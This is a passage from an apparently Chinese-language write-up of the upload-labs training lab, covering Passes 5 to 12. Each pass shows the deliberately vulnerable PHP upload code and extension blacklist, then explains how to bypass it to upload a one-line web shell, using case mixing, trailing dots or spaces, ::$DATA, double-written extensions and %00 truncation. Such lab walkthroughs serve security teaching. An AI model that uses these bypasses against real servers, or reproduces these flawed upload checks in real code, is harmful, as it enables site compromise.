<span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>删除了该语句:<code>$file_ext = strtolower($file_ext); //转换为小写</code></p><p>+++</p><ul><li>拦截方式:<strong>服务端黑名单超级加强</strong>;.htaccess加入了黑名单,取消了后缀名全变为小写字母的strtolower()函数</li><li>绕过方式:采用大小写混合方式绕过.PhP,.PHp5,或着.hTacCesS文件…</li></ul><p><img src="https://s1.ax1x.com/2020/05/02/JvR0FH.png" alt="JvR0FH.png"></p><p>上传成功!</p><p>+++</p><h2 id="Pass-06"><a href="#Pass-06" class="headerlink" title="Pass-06"></a>Pass-06</h2><p>首先,尝试上传php文件,提示信息为:*<em>提示:此文件不允许上传 *</em></p><p>查看提示:</p><blockquote><p>本pass禁止上传.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf后缀文件!</p></blockquote><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span 
class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span 
class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> $file_name = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">// strip trailing dots from the file name</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">// convert to lowercase</span></span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">// remove the string ::$DATA</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).$file_ext;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file,$img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'此文件不允许上传'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>The blacklist in the hint and the one in the source do not match: the hint omits .htaccess.</p><p>The statement removed in this pass: <code>$file_ext = trim($file_ext); // trim leading/trailing whitespace</code></p><p>+++</p><ul><li>Blocking method: <strong>server-side blacklist</strong>; the trim() call that strips whitespace has been dropped;</li><li>Bypass method: upload the one-line shell with a <code>.php</code> extension, intercept the request and append a space after the extension;</li></ul><p><img src="https://s1.ax1x.com/2020/05/02/JvRylt.png" alt="JvRylt.png"></p><p>Upload succeeded!</p><p>+++</p>
<h2 id="Pass-07"><a href="#Pass-07" class="headerlink" title="Pass-07"></a>Pass-07</h2><p>First, try uploading a php file; the message shown is <strong>提示:此文件不允许上传</strong> (Tip: this file is not allowed to be uploaded)</p><p>View the hint:</p><blockquote><p>This pass forbids uploading every extension that can be parsed!</p></blockquote><p>Source:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH))
{</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span 
class="string">'name'</span>]);</span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">// convert to lowercase</span></span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">// remove the string ::$DATA</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">// trim leading/trailing whitespace</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.$file_name;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>+++</p><ul><li>Blocking method: <strong>server-side blacklist</strong>;</li><li>Bypass method: the trailing "." is no longer removed (there is no deldot() call); Windows automatically drops a trailing "." from a file name, so appending a "." to the extension bypasses the check;</li></ul><p>+++</p>
<h2 id="Pass-08"><a href="#Pass-08" class="headerlink" title="Pass-08"></a>Pass-08</h2><p>First, try uploading a php file; the message shown is <strong>提示:此文件不允许上传</strong> (Tip: this file is not allowed to be uploaded)</p><p>View the hint:</p><blockquote><p>This pass forbids uploading files with the extensions .php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf|.htaccess!</p></blockquote><p>Source:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span
class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span 
class="string">".htaccess"</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">// strip trailing dots from the file name</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">// convert to lowercase</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">// trim leading/trailing whitespace</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).$file_ext;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>+++</p><ul><li>Blocking method: <strong>server-side blacklist</strong>; the str_ireplace() call that strips <code>::$DATA</code> is absent in this pass;</li><li>Bypass method: on Windows, if the uploaded file name is test.php::$DATA, a file named test.php is created on the server whose content is identical to the uploaded file, and it gets parsed.</li></ul><p>+++</p>
<h2 id="Pass-09"><a href="#Pass-09" class="headerlink" title="Pass-09"></a>Pass-09</h2><p>First, try uploading a php file; the message shown is <strong>提示:此文件不允许上传</strong> (Tip: this file is not allowed to be uploaded)</p><p>View the hint:</p><blockquote><p>This pass only allows uploading files with the .jpg|.png|.gif extensions!</p></blockquote><p>Source:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span
class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = deldot($file_name);<span 
class="comment">// strip trailing dots from the file name</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">// convert to lowercase</span></span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">// remove the string ::$DATA</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">// trim leading/trailing whitespace</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.$file_name;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>+++</p><ul><li><p>Blocking method: <strong>server-side blacklist</strong>;</p></li><li><p>Bypass method:</p><ul><li><p>The upload path is built from the processed file name, not from the extracted extension:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$img_path = UPLOAD_PATH.<span class="string">'/'</span>.$file_name;</span><br></pre></td></tr></table></figure></li><li><p>Append <strong>dot + space + dot</strong> to the file name</p></li></ul></li></ul><p>+++</p>
<h2 id="Pass-10"><a href="#Pass-10" class="headerlink" title="Pass-10"></a>Pass-10</h2><p>First, try uploading a php file; the message shown is <strong>提示:此文件不允许上传</strong> (Tip: this file is not allowed to be uploaded)</p><p>View the hint:</p><blockquote><p>This pass strips the strings .php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf|.htaccess from the file name!</p></blockquote><p>Source:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">"php"</span>,<span class="string">"php5"</span>,<span class="string">"php4"</span>,<span class="string">"php3"</span>,<span class="string">"php2"</span>,<span class="string">"html"</span>,<span class="string">"htm"</span>,<span class="string">"phtml"</span>,<span class="string">"pht"</span>,<span class="string">"jsp"</span>,<span class="string">"jspa"</span>,<span class="string">"jspx"</span>,<span class="string">"jsw"</span>,<span class="string">"jsv"</span>,<span class="string">"jspf"</span>,<span class="string">"jtml"</span>,<span class="string">"asp"</span>,<span class="string">"aspx"</span>,<span class="string">"asa"</span>,<span class="string">"asax"</span>,<span class="string">"ascx"</span>,<span class="string">"ashx"</span>,<span class="string">"asmx"</span>,<span class="string">"cer"</span>,<span class="string">"swf"</span>,<span class="string">"htaccess"</span>);</span><br><span class="line"></span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = str_ireplace($deny_ext,<span class="string">""</span>, $file_name);</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.$file_name; </span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>+++</p><ul><li><p>Blocking method: <strong>server-side blacklist</strong>; str_ireplace() replaces every blacklisted extension string found in the file name with the empty string:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$file_name = str_ireplace($deny_ext,<span class="string">""</span>, $file_name);</span><br></pre></td></tr></table></figure></li><li><p>Bypass method: <strong>double-writing bypass</strong> (str_ireplace() makes a single, non-recursive pass, so an extension written twice survives it);</p></li></ul><p>+++</p>
<h2 id="Pass-11"><a href="#Pass-11" class="headerlink" title="Pass-11"></a>Pass-11</h2><p>First, try uploading a php file; the message shown is <strong>提示:只允许上传.jpg|.png|.gif类型文件!</strong> (Tip: only .jpg|.png|.gif files are allowed!)</p><p>View the hint:</p><blockquote><p>In this pass the upload path is controllable!</p></blockquote><p>Source:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span
class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> $ext_arr = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> $file_ext = substr($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],strrpos($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> <span class="keyword">if</span>(in_array($file_ext,$ext_arr)){</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = $_GET[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_ext;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path)){</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span>{</span><br><span class="line"> $msg = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><blockquote></blockquote><p>+++</p><ul><li><p>拦截方式:<strong>服务端白名单</strong>;</p><ul><li><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$img_path = $_GET[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>,<span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_ext;</span><br><span class="line"><span class="comment">// $img_path直接拼接</span></span><br></pre></td></tr></table></figure></li></ul></li></ul><ul><li><p>绕过方式:<strong>利用%00截断绕过</strong>;</p><ul><li>需关闭magic_quotes_gpc</li><li>php 版本<5.3.4</li></ul></li></ul><p>+++</p><h2 id="Pass-12"><a href="#Pass-12" class="headerlink" title="Pass-12"></a>Pass-12</h2><p>首先,尝试上传php文件,提示信息为:<strong>提示:只允许上传.jpg|.png|.gif类型文件!</strong> </p><p>查看提示:</p><blockquote><p>本pass上传路径可控!</p></blockquote><p>源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> $ext_arr = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> $file_ext = substr($_FILES[<span 
class="string">'upload_file'</span>][<span class="string">'name'</span>],strrpos($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> <span class="keyword">if</span>(in_array($file_ext,$ext_arr)){</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = $_POST[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_ext;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path)){</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"上传失败"</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> }</span><br><span 